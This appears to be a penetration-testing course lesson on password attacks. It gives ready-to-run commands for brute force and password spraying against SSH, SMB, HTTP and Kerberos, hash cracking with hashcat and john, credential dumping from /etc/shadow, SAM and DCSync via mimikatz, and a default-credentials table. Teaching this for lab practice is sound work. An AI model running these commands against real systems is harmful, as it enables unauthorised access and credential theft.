Vulnerability Analysis & Exploitation
Password Attacks
4 min read
Password attacks remain one of the most effective ways to gain access. This lesson covers online and offline password cracking techniques.
Online Password Attacks
Online attacks target live services. Use them carefully to avoid account lockouts.
Hydra (Multi-Protocol)
SSH Brute Force:
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
FTP:
hydra -L users.txt -P passwords.txt ftp://10.10.10.10
HTTP POST Login:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
SMB:
hydra -L users.txt -P passwords.txt smb://10.10.10.10
Hydra Options
| Flag | Purpose |
|---|---|
-l |
Single username |
-L |
Username list |
-p |
Single password |
-P |
Password list |
-t |
Threads (default 16) |
-f |
Stop after first match |
-v |
Verbose output |
CrackMapExec (Windows/AD)
# SMB password spray
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt
# WinRM
crackmapexec winrm 10.10.10.10 -u user -p password
# Check local admin
crackmapexec smb 10.10.10.10 -u user -p password --local-auth
Medusa
# SSH attack
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh
# HTTP
medusa -h 10.10.10.10 -u admin -P passwords.txt -M http -m DIR:/admin
Offline Password Cracking
Offline attacks work on captured hashes without network interaction.
Hash Identification
# Using hashid
hashid 'hash_here'
# Using hash-identifier
hash-identifier
# Common hash patterns
MD5: 32 hex characters
SHA1: 40 hex characters
SHA256: 64 hex characters
NTLM: 32 hex characters (Windows)
bcrypt: $2a$, $2b$, $2y$ prefix
Hashcat (GPU-Powered)
Basic Usage:
hashcat -m <mode> hash.txt wordlist.txt
Common Modes:
| Mode | Hash Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 1000 | NTLM |
| 3200 | bcrypt |
| 1800 | sha512crypt ($6$) |
| 500 | md5crypt ($1$) |
| 13100 | Kerberoast |
| 18200 | AS-REP Roast |
NTLM Cracking:
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
With Rules:
hashcat -m 1000 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
John the Ripper
Basic Usage:
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Specify Format:
john --format=raw-md5 --wordlist=rockyou.txt hashes.txt
john --format=nt --wordlist=rockyou.txt ntlm_hashes.txt
Show Cracked:
john --show hashes.txt
Extracting Hashes
Linux Password Hashes
# Hashes stored in /etc/shadow
# Format: user:$id$salt$hash:...
# Unshadow for John
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt
Windows Password Hashes
From SAM Database (Local):
# With Impacket (if you have admin access)
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
# Using mimikatz on target
mimikatz# sekurlsa::logonpasswords
From Domain Controller:
# DCSync attack
impacket-secretsdump domain.local/admin:password@10.10.10.10
Password Spray Attacks
Spray one password against many users to avoid lockouts:
# Using CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!' --continue-on-success
# Using Kerbrute (Kerberos)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt 'Password123!'
Wordlists
Built-in Kali Wordlists
/usr/share/wordlists/
├── rockyou.txt # Most common
├── dirb/common.txt # Web directories
├── dirbuster/ # More web wordlists
└── seclists/ # Comprehensive collection
Custom Wordlists
Using cewl:
# Generate wordlist from website
cewl http://10.10.10.10 -w custom_wordlist.txt
# With depth and minimum word length
cewl http://10.10.10.10 -d 2 -m 5 -w custom.txt
Using crunch:
# Generate all 4-char combinations
crunch 4 4 abcdefghijklmnopqrstuvwxyz -o wordlist.txt
# With pattern
crunch 8 8 -t Pass@@%% -o wordlist.txt
# @ = lowercase, , = uppercase, % = number, ^ = symbol
Common Default Credentials
Always try these before brute forcing:
| Service | Username | Password |
|---|---|---|
| SSH | root, admin | root, admin, password |
| MySQL | root | (blank), root, mysql |
| PostgreSQL | postgres | postgres |
| Tomcat | tomcat, admin | tomcat, admin, s3cret |
| Jenkins | admin | admin |
| phpMyAdmin | root | (blank) |
| WordPress | admin | admin |
Password Attack Workflow
1. Enumerate users
└── SMTP, RID cycling, web enumeration
2. Try default credentials
└── Check service documentation
3. Password spray (if many users)
└── Common passwords: Password1, Welcome1
4. Targeted brute force (if few users)
└── hydra with rockyou.txt
5. Offline cracking (if hashes obtained)
└── hashcat with rules
With exploitation techniques mastered, we'll move to web application attacks in the next module. :::